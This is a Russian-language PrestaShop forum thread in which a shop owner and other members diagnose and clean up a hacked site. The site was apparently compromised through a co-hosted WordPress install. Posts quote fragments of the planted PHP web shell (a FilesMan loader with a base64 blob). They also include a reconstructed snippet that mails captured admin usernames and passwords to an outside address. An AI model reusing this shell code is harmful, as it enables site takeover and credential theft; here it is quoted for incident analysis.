вирус для wordpress на сайте престашоп

[1ncom1ng]

доброго вечера!
столкнулся с траблами.

итак - визуально на сайте не отображается никак. сначала появились пустые 0кб файлы повсем папкам
затем - появилась папка с названием wp-config
при этом в исп-менеджере сожрано всё свободное место на хостинге, а сайт возвращает соответственно хттп500. но использование диска показывает только использование на половину, а вкладка главное показывает 100% забитости.

нашёл добавления в индекс.пхп в корне - восстановил из бэкапа. есть ещё другой сайт для теста, так там за год вообще прописалась главная страница с словами hacked by ... удалил всё нафиг.

также появились тхт файлы с текстом hacked by кто-то там...

я так понимаю, что где-то прописался вредоносный скрипт. хостер жаловался на определенный файл - удалил его (тест.пхп в одном из модулей).

планирую удалить всё кроме папок модулей и тем и заново поставить ту же версию престашоп и вкорячить старую бд на место.

у вас хочу спросить, кто сталкивался с таким? и что можно сделать? пароли все сменил

[-SiGi-]

Точно такая же проблема. Решение есть?

[DarinSr]

Проверьте файл /controllers/admin/AdminLoginController.php.

[1ncom1ng]

Проверьте файл /controllers/admin/AdminLoginController.php.

Проверил, модифицирован, заменил на стандартный.
Подскажите, а как избежать повторного заражения, где источник то?

[Mr.Sen]

Такая же тема - http://prestashop-forum.ru/index.php/topic,6876.0.html
Нужно создать раздел по безопасности, тема актуальная. Жалко если потеряется, найти что-то на форуме не реально. Сильно много тем.

У вас на хостинге, кроме prestashop, есть другие cms? Такие взломы чаще всего на wordpress и его приложениях.

[1ncom1ng]

Такая же тема - http://prestashop-forum.ru/index.php/topic,6876.0.html
Нужно создать раздел по безопасности, тема актуальная. Жалко если потеряется, найти что-то на форуме не реально. Сильно много тем.

У вас на хостинге, кроме prestashop, есть другие cms? Такие взломы чаще всего на wordpress и его приложениях.

да есть, как раз вордпресс. уже потёр его к чертям.

[Миколас]

Им на отдельном хостинге держать нужно.
Wordpress постояно ломают.

[1ncom1ng]

Свежие новости!
Вернулись удалённые файлы и папки.
а гугл аналитикс сообщил, что у ресурса добавился владелец)))

удалил файлик гугла с фтп, удалил владельца.
и пошёл смотреть какие папки и файлы были изменены примерно во время появления нового владельца.

перечисляю:
-в папке модулей оказался забавненький файл cacheplugin.php c кодом

Код: [Выделить]

<?php
$auth_pass = "";
$color = "#df5";
$default_action = base64_decode('RmlsZXNNYW4=');
$default_use_ajax = true;
$default_charset = 'Windows-1251';
$xYEzDu6r3EZT="GR5yYXp3YH1bFJiSkhoc2RGVnNRMkkxUjNoelhTbGVNakV5T1RRd05USXdOQ2twTzMxbGRtRnNLQ1I0YzFacFZFOWlObWcwVGlrNyIpKTs6="));
return;
?>
Следующие файлы также попали в замес и находятся в папке модулей index.php .htaccess archive.php mw.html Xmw.php
Какой-то morocanwolf в общем меня "взломал"

-папки wp-config, tanis

Проблема с забитым до отказа хостингом решилась - отключил ведение логов ошибок для домена - сразу освободилось 15гб.

Судя по времени появления файлов в папке модулей, заражена вся папка - изменения с разницей в 0-1 секунды пробежались по всем папкам.

[Миколас]

Вычистить трудно будет. Лучше снести все, заново установить prestashop, импортировать данные со старого магазина. Только так будешь уверен, что на сайте нет вируса.

[1ncom1ng]

Вычистить трудно будет. Лучше снести все, заново установить prestashop, импортировать данные со старого магазина. Только так будешь уверен, что на сайте нет вируса.

Уже занимаюсь.
Фишка в том, что нужно знать как эта хрень туда пролезла!

Я думаю, что из-за установки какого-то модуля.

И как обезопасить себя от подобных ситуёвин? Пока что сделал права на папки 755, файлы 664, и снова сменил пароль.

Но как я понимаю,вышеуказанный пхп код сам генерировал доступ и пароль

[Adik]

http://prestashop-forum.ru/index.php/topic,6876.msg43430.html#msg43430

Указанный код - это только часть кода. Из него ничего не понятно. Этот файл подключается в другом файле.

[1ncom1ng]

http://prestashop-forum.ru/index.php/topic,6876.msg43430.html#msg43430

Указанный код - это только часть кода. Из него ничего не понятно. Этот файл подключается в другом файле.

Если нужно, то могу привести другие коды.
в новых папках раскиданы около 20 сайтмапов и несколько пхп

[Adik]

Не нужно. Я такое уже видел. Вот эта переменная

Код: [Выделить]

$default_action = base64_decode('RmlsZXNNYW4=');от Shell скрипта, при декодировании получится

Код: [Выделить]

$default_action = 'FilesMan';
Если собрать все куски кода, то будет так

Код: [Выделить]

$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Egy_Spider
UserName: " . htmlspecialchars($tacfgd['uname']) . "
PassWord:
" . htmlspecialchars($tacfgd['pword']) . "
Message:
" . "
E-server: " . htmlspecialchars($_SERVER['REQUEST_URI']) . "
E-server2: " . htmlspecialchars($_SERVER["SERVER_NAME"]) . "

IP:
";
mail("wp@live.fr", "Shell http://$web$inj", "$body");
# Web Shell by boff
$auth_pass = "";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
.....
Вест shell скрипт не выкладаваю. Но это точно он. Уже не первый клиент обращается с точно такой же проблемой.

[Adik]

Последнии случаи взлома уже сделаны имено под prestashop. Части shell скрипта срхранены в файлах перевода темы и модулей. Атака направлена имено на престу. Проверяйте файлы перевода, особое внимание на редкие языки jp.php, ch.php и т.д.

[1ncom1ng]

Последнии случаи взлома уже сделаны имено под prestashop. Части shell скрипта срхранены в файлах перевода темы и модулей. Атака направлена имено на престу. Проверяйте файлы перевода, особое внимание на редкие языки jp.php, ch.php и т.д.

Спасибо за совет.
Но это пользователь сам должен занести или установить модуль или тему, верно?

Попутно хотелось бы узнать для чего раскиданы по 2 файла почти в каждом каталоге - все 0 байт.
Их я удалил - скачал и нашёл через тотал коммандер все 0б файлы и удалил.